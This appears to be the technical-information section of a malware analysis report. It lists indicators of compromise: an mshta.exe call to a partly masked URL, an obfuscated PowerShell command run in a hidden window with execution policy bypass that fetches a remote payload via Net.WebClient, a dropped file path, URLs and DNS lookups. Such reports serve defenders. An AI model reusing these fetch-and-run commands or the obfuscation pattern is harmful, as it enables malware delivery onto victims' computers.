Technical Information
- '<SYSTEM32>\mshta.exe' http://po##y.site/ID-4513-214
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "SV P72 'http://fo###tinfo.site/indigo/pwsc/pCVKyxxPoTiuzak';SI Variable:\1J6 'Net.WebClient';ls pena*;SV h (&(Variable *cut*t).Value.InvokeCommand.(((Variable *cut*t).Value.Inv...
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\1b5161b7ceb03d93d5e8331533176fe2_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://po##y.site/ID-4513-214
- http://cd#.#hopify.com/s/files/1/0386/8341/0477/t/1/assets/cov10.html
- http://fo###tinfo.site/indigo/pwsc/pCVKyxxPoTiuzak
- http://we###on.site:83/en-us/index.html?pa################# via we###on.site
- http://we###on.site:83/en-us/test.html?me########## via we###on.site
- DNS ASK po##y.site
- DNS ASK cd#.#hopify.com
- DNS ASK fo###tinfo.site
- DNS ASK we###on.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "SV P72 'http://fo###tinfo.site/indigo/pwsc/pCVKyxxPoTiuzak';SI Variable:\1J6 'Net.WebClient';ls pena*;SV h (&(Variable *cut*t).Value.InvokeCommand.(((Variable *cut*t).Value.Inv...' (with hidden window)